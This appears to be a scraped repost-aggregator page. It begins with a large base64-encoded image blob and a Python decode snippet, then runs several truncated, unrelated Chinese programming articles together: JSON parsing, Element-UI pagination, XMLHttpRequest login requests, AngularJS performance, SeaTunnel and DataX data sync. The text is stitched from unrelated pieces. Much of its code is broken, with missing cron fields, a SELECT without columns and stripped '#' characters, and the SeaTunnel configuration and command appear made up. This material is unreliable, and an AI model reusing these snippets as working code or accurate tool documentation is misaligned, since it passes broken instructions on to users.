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'img_data = base64.b64decode(url) 返回的是二进制数据print(type(img_data))fn = open('code.png','wb')fn.write(img_data)fn.close()'''我们打开了一个有base64加密的图片数据''' 本篇文章为转载内容。原文链接：https://blog.csdn.net/httpsssss/article/details/116136614。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

JSON（JavaScript对象表示法）是一种简洁的数据传递格式，用于以文本形式保存和传递数据。JSON以键值对映射的形式构建数据，兼容多种变量类型，例如文本、数值、逻辑值和列表等。 在Python中，我们可以使用json模块来读取JSON数据。json模块拥有loads()方法，可以将JSON对象变为Python中的关联数组（dictionary）或列表（list）。 import json JSON对象 json_str = '[1, 2, 3, 4, 5]' 将JSON对象变为列表 json_list = json.loads(json_str) print(json_list) [1, 2, 3, 4, 5] 在上面的代码中，我们首先导入了json模块。然后，我们声明了一个含有JSON对象的文本。最后，我们使用loads()方法将JSON对象变为Python列表。 如果JSON对象含有了多个字段和值，我们可以将JSON对象变为Python关联数组。 import json JSON对象 json_str = '{"name": "Tom", "age": 18, "gender": "male"}' 将JSON对象变为关联数组 json_dict = json.loads(json_str) print(json_dict) {'name': 'Tom', 'age': 18, 'gender': 'male'} 在上面的代码中，我们声明了一个含有多个字段和值的JSON对象。然后，我们使用loads()方法将JSON对象变为Python关联数组。 总的来说，将JSON变为Python中的列表或关联数组非常简单，只需要使用json模块中的loads()方法即可。

JSON是一种简洁的资料交换格式，在Web开发中经常使用。在易语言中，可以通过解读JSON来取得其中的资料，下面是一个例子。 // 引入相关组件 JSON组件 = 引入组件("JSON"); 文件组件 = 引入组件("文件操作"); // 读取JSON文件 文件句柄 = 文件组件.打开文件("data.json"); JSON字符串 = 文件组件.读取文本(文件句柄); // 解读JSON JSON对象 = JSON组件.解读(JSON字符串); // 取得资料 名字 = JSON对象.名字; 年纪 = JSON对象.年纪; 电话 = JSON对象.联系方法.电话; 地址 = JSON对象.联系方法.地址; // 展示资料 界面.提示框("名字：" + 名字 + "\n年纪：" + 年纪 + "\n电话：" + 电话 + "\n地址：" + 地址); 以上代码演示了如何通过JSON组件解读一个JSON文件，并取得其中的资料。其中，使用了文件操作组件读取JSON文件内容，再使用JSON组件解读JSON字符串，最后取得其中的资料。 需要留意的是，在取得JSON中层级的资料时，可以通过点号来访问。例如，取得联系方法中的电话号码，可以使用“JSON对象.联系方法.电话”的方法。 总之，JSON的解读在易语言中十分简便。掌握了JSON的解读方法，可以方便地加工Web开发中的资料。

...并对各种异常情况（如数据库插入异常）进行统一且优雅的处理。 JSON（JavaScript Object Notation） , JSON是一种轻量级的数据交换格式，易于人阅读和编写，同时也易于机器解析和生成。在本文提供的代码示例中，ShouldBindJSON方法就是用来从HTTP请求中解析并绑定JSON格式的数据到Go语言结构体变量（这里指User类型），从而将客户端提交的用户信息转换为服务器端可操作的对象。 并发冲突 , 在多线程或多进程环境下，当多个操作尝试同时访问和修改同一数据资源时，如果没有合适的同步机制，可能会导致数据不一致或预期外的结果，这种情况被称为并发冲突。在实际开发在线商店系统时，例如在高并发场景下处理用户注册请求，可能出现多个请求同时尝试插入相同的用户名等信息到数据库，此时就需要妥善处理并发冲突，确保数据的一致性和完整性。

...的时候，经常会和海量数据打交道，而用户呢，也常常是通过页面来查看这些五花八门的数据。这时候，一个良好的分页功能就显得尤为重要。今天，咱们就来聊一聊，在Element-UI这个大家伙里头，那个叫做elpagination的分页组件是怎么巧妙地实时获取并刷新数据的吧！ 一、首先，我们需要了解什么是分页组件 分页组件是一种常见的前端界面元素，它可以让我们在展示大量数据时，只显示一部分数据，而其他的数据显示为"更多"或者"下一页"等状态。这样子做不仅可以嗖嗖地提升加载速度，还能让用户轻轻松松找到自己心水的内容，岂不美哉？ 二、elpagination分页组件的使用方法 在Element-UI中，我们可以直接通过引入相应的CSS和JS文件，然后在HTML中添加相应的标签来使用elpagination分页组件。下面是一个简单的使用示例： html 在这个例子中，我们首先引入了el-pagination的样式和JavaScript库，然后在模板中添加了一个el-pagination组件。我们在这玩意儿的组件上搞了个叫handleCurrentChange的小开关，好比这样：只要用户手一滑，翻了页码，这个小开关就立马启动工作，执行它的任务。同时呢，我们还巧妙地运用了:current-page.sync和:total这两个小家伙，把当前页码和总的页数，像绑鞋带一样牢牢地绑定在了currentPage和total这两个变量上，这样一来，它们就能实时同步更新啦！ 三、动态获取并更新数据 现在，我们已经知道如何在前端界面中显示分页信息了，但是，我们还需要让这个分页组件能够根据我们的数据动态获取并更新信息。这就需要用到JavaScript的数组操作方法和Vue.js的数据绑定特性。 首先，我们需要确保我们的tableData数组能够实时反映后端服务器上的数据变化。这通常是通过监听后端服务器的某些API接口来实现的。例如，在Vue.js中，我们可以通过以下方式来实现这个功能： javascript new Vue({ el: 'app', data: { tableData: [] }, mounted() { this.fetchData(); }, methods: { fetchData() { // 这里是发送请求获取数据的逻辑 fetch('https://api.example.com/data') .then(response => response.json()) .then(data => (this.tableData = data)) } } }) 在这个例子中，我们首先创建了一个新的Vue实例，并定义了一个空的tableData数组作为其数据源。接着，在组件挂载的时候，我们瞅准了mounted这个关键时刻，果断调用了fetchData这个小家伙，让它麻溜地跑去服务器那把我们需要的数据给拽过来。最后，我们将服务器返回的数据赋值给了tableData数组。 四、总结 总的来说，elpagination分页组件提供了一种方便的方式来处理大量数据。嘿，你知道吗？借助Vue.js那个超酷的数据绑定功能，咱们就能轻轻松松地让分页信息实现同步更新，就像魔法一样实时展现出来！另外，我们还能巧妙地运用JavaScript里面的数组处理技巧，让咱们的应用能够更灵敏地应对用户的各种操作，这样一来，就能带给用户更加棒的使用感受啦！

...除相应内容。 GET方法: function btn_get_click(){var httpRequest = new XMLHttpRequest();httpRequest.onreadystatechange = handleResponse;// httpRequest.open("GET", "/user/login?user_name=" + encodeURIComponent(username) + "&password=" +// encodeURIComponent(password));httpRequest.open("GET", "/course/schedule?termno=0&week=0");httpRequest.send(null);}function handleResponse(e) {if (e.target.readyState == XMLHttpRequest.DONE){document.getElementById("result").innerHTML = e.target.responseText;var responseTextJson = JSON.parse(e.target.responseText);alert(responseTextJson.length);alert(responseTextJson[0].classroom);// alert(responseTextJson.DATAINFO[0].PROJ_NAME); } } GET方法是明文的,处理上面的类似用户名密码的其实要用POST方法.(非明文方式) PSOT: function clickLoin() {var yonghu = document.getElementById("username").value;//获取用户名var mima = document.getElementById("password").value;//获取密码var httpRequest = new XMLHttpRequest();httpRequest.onreadystatechange = handleResponse;var getloin ="username="+yonghu+"&&password="+mima;httpRequest.open("post", "/login");//以下这句在POST时要加上httpRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");httpRequest.send(getloin);}function handleResponse(e) {if (e.target.readyState == XMLHttpRequest.DONE){// var responseTextJson = JSON.parse(e.target.responseText);alert(e.target.responseText);} } 两者的区别: 补充:(题外话) 后端post接口开发者的想法: post函数定义了请求的地址，参数，还有一个回调函数。 而post的概念就是 “我执行的时候，需要你给我地址和参数，然后我执行完了，就完了，但是如果开发人员你，需要用到我返回的数据和状态，你要用，怎么办呢？ 那没关系，不是还有一个回调函数吗？我再提供一个回调函数给你，至于你想怎么用，就用这个回调函数实现，于是我只把返回的数据，状态放在参数列表里面，并且下一个”执行“你外部函数的命令， 具体怎么实现，你要怎么用，是你开发人员的事了。 转载于:https://www.cnblogs.com/lyggqm/p/5687381.html 本篇文章为转载内容。原文链接：https://blog.csdn.net/weixin_30679823/article/details/95213062。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...一个网页塞满了大量的数据，浏览器就像个忙得团团转的小蜜蜂，需要耗费不少时间和精力去处理这些信息，这样一来，网页打开的速度就会变慢，咱们用户浏览网页的体验自然也就大打折扣啦。 为了解决这个问题，我们可以采取以下几种措施： 1. 数据分页 在处理大量数据时，我们可以将其分成多个部分，并在每个部分之间添加分页器。这样一来，用户每次瞧见的就只是一部分数据，而不是满满当当全部数据，这样一来，浏览器的压力也就减轻了，网页加载的速度自然就像火箭升空一样噌噌噌地提高了。 html { {item} } Next Page 2. 缓存数据 如果我们知道某个数据不会经常改变，我们可以将其缓存在浏览器中，以便下次访问时直接从缓存中读取，而不需要重新计算。 javascript var cachedData = {}; $http.get('data.json').then(function(response) { cachedData = response.data; }); $scope.items = cachedData; 3. 使用虚拟滚动 对于长列表，我们可以使用虚拟滚动来减少浏览器的负担。虚拟滚动是指只显示可见区域的数据，而不是全部数据。这种方法可以大大减少浏览器的负担，提高网页的加载速度。 css .scrollable { overflow-y: scroll; } .scrollable::-webkit-scrollbar { width: 8px; } .scrollable::-webkit-scrollbar-track { background-color: f1f1f1; } .scrollable::-webkit-scrollbar-thumb { background-color: 888; } .scrollable::-webkit-scrollbar-thumb:hover { background-color: 555; } 通过以上几种方法，我们可以有效地解决“ng-repeat”中的性能瓶颈问题，提高网页的加载速度和用户体验。同时，咱们也得留心优化代码这块儿，别让那些不必要的计算和内存消耗拖慢了网页速度，这样一来，咱就能更上一层楼，把网页性能提上去啦！ 总的来说， AngularJS 是一个非常强大的前端框架，它可以让我们轻松地创建出动态、交互式的网页应用程序。不过在实际用起来的时候，咱们也得留心优化代码这件事儿，别让性能瓶颈这类问题冒出来绊住咱们的脚。这样一来，才能更好地提升用户体验，让大家用得更顺溜、更舒心。希望通过这篇文章，能对你有所帮助！

...常需要处理各种类型的数据，其中最常见的一种就是JSON格式的数据。JSON这东西，可以说是个超级实用的数据传输小能手。它设计得既简单又轻便，不仅咱们人类读起来、写起来轻松愉快，连机器也能毫不费力地理解和生成它。就像是数据世界里的“通用语言”，让信息交换变得轻轻松松、简简单单。然而，在日常处理大量JSON数据时，我们免不了会遇到些小插曲，比如那个让人头疼的JSON解析异常问题。 在本文中，我们将以SeaTunnel为例，深入探讨如何解决JSON解析异常的问题，并给出具体的实例代码。 二、什么是SeaTunnel SeaTunnel是一个开源的实时数据同步系统，它主要用于将数据从一个地方快速、准确地同步到另一个地方。SeaTunnel支持多种数据源和目标，包括但不限于MySQL、Oracle、HBase、HDFS等。它还配备了一整套超级好用的API工具箱，让开发者能够轻轻松松地进行数据同步操作，就像玩乐高积木一样便捷。 三、JSON解析异常的原因 JSON解析异常通常发生在数据源返回的JSON格式错误的情况下。比如，假如数据源给咱们返回的JSON字符串里头混进了不应该出现的非法字符，或者整个结构乱七八糟，跟JSON的标准格式对不上号，这时候SeaTunnel可就不乐意了，它会立马抛出一个JSON解析异常来表达它的不满和抗议。 四、解决JSON解析异常的方法 对于JSON解析异常的问题，我们可以采取以下几种方法来解决： 1. 检查并修正数据源返回的JSON数据 这是最直接也是最有效的方法。我们完全可以通过瞅瞅数据源头返回的结果，像侦探破案那样，揪出引发解析异常的那个“罪魁祸首”，然后对症下药，把它修正过来。 2. 使用JSON解析库 SeaTunnel本身已经内置了对JSON的支持，但是如果数据源返回的JSON格式非常复杂，我们可能需要使用更强大的JSON解析库来进行处理。 3. 优化SeaTunnel配置 通过调整SeaTunnel的配置参数，我们可以让其更加灵活地处理各种类型的JSON数据。 五、实战演示 下面，我们将通过一个实际的例子，展示如何使用SeaTunnel处理JSON解析异常的问题。 假设我们需要从一个外部服务器上获取一些JSON格式的数据，并将其同步到本地数据库中。但是，这个服务器上的JSON数据格式有点儿“另类”，它里面掺杂了一大堆不合规的字符呢！ 首先，我们需要修改SeaTunnel的配置，使其能够容忍这种特殊的JSON格式。具体来说，我们可以在配置文件中添加以下代码： yaml processors: - name: json properties: tolerant: true 然后，我们可以创建一个新的任务，用于从服务器上获取JSON数据： json { "name": "example", "sources": [ { "type": "http", "properties": { "url": "https://example.com/data.json" } } ], "sinks": [ { "type": "mysql", "properties": { "host": "localhost", "port": 3306, "username": "root", "password": "", "database": "example", "table": "data" } } ] } 最后，我们只需要运行 SeaTunnel 的命令，就可以开始同步数据了： bash ./seata-tunnel.sh run example 六、结论 总的来说，解决SeaTunnel中的JSON解析异常问题并不是一件困难的事情。只要我们掌握了正确的处理方法，就能够有效地避免这种情况的发生。同时，我们也可以利用SeaTunnel的强大功能，来处理各种复杂的JSON数据。

...何在Datax中实现数据自动更新功能？ 引言 DataX，阿里开源的一款高性能、稳定可靠的数据同步工具，以其强大的异构数据源之间高效稳定的数据迁移能力，被广泛应用于大数据领域。这篇内容，咱们要接地气地聊聊怎么巧妙灵活运用DataX这把利器，来一键实现数据自动更新的魔法，让咱们的数据搬运工作变得更智能、更自动化，轻松省力。 1. DataX的基本原理与配置 首先，理解DataX的工作原理至关重要。DataX通过定义job.json配置文件，详细描述了数据源、目标源以及数据迁移的规则。每次当你运行DataX命令的时候，它就像个聪明的小家伙，会主动去翻开配置文件瞧一瞧，然后根据里边的“秘籍”来进行数据同步这个大工程。 例如，以下是一个简单的DataX同步MySQL到HDFS的job.json配置示例： json { "job": { "content": [ { "reader": { "name": "mysqlreader", "parameter": { "username": "root", "password": "your_password", "connection": [ { "jdbcUrl": ["jdbc:mysql://localhost:3306/test?useSSL=false"], "table": ["table_name"] } ] } }, "writer": { "name": "hdfswriter", "parameter": { "path": "/user/hive/warehouse/table_name", "defaultFS": "hdfs://localhost:9000", "fileType": "text", "fieldDelimiter": "\t" } } } ], "setting": { "speed": { "channel": "5" } } } } 这段代码告诉DataX从MySQL的test数据库中读取table_name表的数据，并将其写入HDFS的指定路径。 2. 数据自动更新功能的实现策略 那么，如何实现数据自动更新呢？这就需要借助定时任务调度工具（如Linux的cron job、Windows的任务计划程序或者更高级的调度系统如Airflow等）。 2.1 定义定期运行的DataX任务 假设我们希望每天凌晨1点整自动同步一次数据，可以设置一个cron job如下： bash 0 1 /usr/local/datax/bin/datax.py /path/to/your/job.json 上述命令将在每天的凌晨1点执行DataX同步任务，使用的是预先配置好的job.json文件。 2.2 增量同步而非全量同步 为了实现真正的数据自动更新，而不是每次全量复制，DataX提供了增量同步的方式。比如对于MySQL，可以通过binlog或timestamp等方式获取自上次同步后新增或修改的数据。 这里以timestamp为例，可以在reader部分添加where条件筛选出自特定时间点之后更改的数据： json "reader": { ... "parameter": { ... "querySql": [ "SELECT FROM table_name WHERE update_time > 'yyyy-MM-dd HH:mm:ss'" ] } } 每次执行前，你需要更新这个update_time条件为上一次同步完成的时间戳。 2.3 持续优化和监控 实现数据自动更新后，别忘了持续优化和监控DataX任务的执行情况，确保数据准确无误且及时同步。你完全可以瞅瞅DataX的运行日志，就像看故事书一样，能从中掌握任务执行的进度情况。或者，更酷的做法是，你可以设定一个警报系统，这样一来，一旦任务不幸“翻车”，它就会立马给你发消息提醒，让你能够第一时间发现问题并采取应对措施。 结语 综上所述，通过结合DataX的数据同步能力和外部定时任务调度工具，我们可以轻松实现数据的自动更新功能。在实际操作中，针对具体配置、数据增量同步的策略还有后期维护优化这些环节，咱们都需要根据业务的实际需求和数据的独特性，灵活机动地进行微调优化。就像是烹饪一道大餐，火候、配料乃至装盘方式，都要依据食材特性和口味需求来灵活掌握，才能确保最终的效果最佳！这不仅提升了工作效率，也为业务决策提供了实时、准确的数据支持。每一次成功实现数据同步的背后，都藏着我们技术人员对数据价值那份了如指掌的深刻理解和勇往直前的积极探索精神。就像是他们精心雕琢的一样，把每一个数据点都视若珍宝，不断挖掘其隐藏的宝藏，让数据真正跳动起来，服务于我们的工作与生活。

